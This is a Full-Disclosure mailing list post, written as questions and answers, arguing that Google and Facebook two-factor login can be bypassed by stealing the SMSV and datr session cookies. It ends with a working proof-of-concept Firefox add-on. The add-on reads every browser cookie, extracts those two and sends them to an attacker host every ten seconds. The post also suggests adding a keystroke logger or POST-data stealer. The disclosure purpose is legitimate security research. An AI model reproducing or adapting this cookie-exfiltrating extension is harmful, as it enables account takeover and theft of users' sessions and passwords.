(Google && Facebook) X factor authentication. Is X enough to sit back and relax?

["Z" <Z () wechall net>]

Google and Facebook have recently added 2 factor authentication to their
services. 

Great news, so am I protected now?
There are many type of attacks and attackers. Some forms of attacks are
defeated by this 2 factor authentication (shoulder surfing, hardware
keylogging, network MITM), other types of attacks defeat these 2 factor
authentication protection, e.g. malwares, malicious browser extensions. 

Why are some attacks useless and why is malware still effective against
these 2 factor authentications?
Back to the basics: after logging in how can the server know that you are
the authenticated user? There is only 1 thing what really matters: session
cookies.

I see, but who has access to my session cookies?
Every program running in the same user context on the machine. This is the
browser, browser addons, a malware running on the computer, an attacker
having an interactive shell on your computer, etc.

Is the session cookie stolable/clonable?
Yes, it is a plain text file.

Which cookies do I have to protect? 
On facebook, the datr cookie is responsible to "skip" the second factor on
"known" computers.
On gmail/google, the SMSV cookie is responsible to "skip" the second factor
on "known" computers.
Even if the attacker is from different country, using different browser, it
does not matter. If the cookies are expired, first try to set the expirity
date to the future, it's not tested if it will work.

And what can the attacker do if he steals these cookies?
The attacker can simply insert these cookies into his browser, and login
with 1 factor defeated.

What if someone is so paranoid that he always uses the 2 factor auth?
The current session could be still stolen by the attacker. Otherwise one has
to infect the mobile device, clone google authenticator or forward the sent
sms-s to another mobile device (for proof search for Zitmo). Since google
authenticator is a soft token, it is cloneable. 

Is it your idea to steal session cookies?
No, but this field is kinda under-educated/under-valued.

And how can the attacker steal the user password?
Append a keystroke logger or a postdata stealer to this POC. There are
examples here: www.jfgit.com

But I'm using Linux/UNIX/BSD/Solaris/OSX/Win7, am I still vulnerable?
Yes.

But google and facebook are using httponly and secure flags on the cookies.
Am I still vulnerable?
Yes.

Any recommendations?
A "Restrict session to ip" option can help in the case if the attacker can't
forward requests through the victim's computer. But basically, no, there is
no help. 

Who are you?
Z

I don't believe this, prove it!
Firefox POC addon will catch Google and Facebook password and steal the
important cookies, and send the actual cookie value every 10 seconds to the
attacker 127.0.0.1


############################################################################
#############################
//Z
host = 'http://127.0.0.1/';
interval = 10;

gcookie = "";
fbcookie = "";

var event = {
    observe: function (subject, topic, data) {
        var cookieMgr =
Components.classes["@mozilla.org/cookiemanager;1"].getService(Components.int
erfaces.nsICookieManager);
        for (var e = cookieMgr.enumerator; e.hasMoreElements();) {

            var cookie =
e.getNext().QueryInterface(Components.interfaces.nsICookie);

            cookie_str = "host:" + cookie.host + " name:" + cookie.name + "
value:" + cookie.value + " expires:" + cookie.expires + " path:" +
cookie.path + " isSecure:" + cookie.isSecure + " policy:" + cookie.policy +
" isDomain:" + cookie.isDomain + " status:" + cookie.status + "\n";
                        
            if (cookie.name == "SMSV") {
                gcookie = cookie_str;
            }
            if (cookie.name == "datr") {
                fbcookie = cookie_str;
            }
        }

        http = new XMLHttpRequest();
        http.open("GET", host + "?" + fbcookie + " " + gcookie, true);
        http.send();
        
                gcookie = "";
                fbcookie = "";

    }
}
var timer =
Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfa
ces.nsITimer);
const TYPE_REPEATING_PRECISE =
Components.interfaces.nsITimer.TYPE_REPEATING_PRECISE;

timer.init(event, interval * 1000, TYPE_REPEATING_PRECISE);

############################################################################
#############################


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/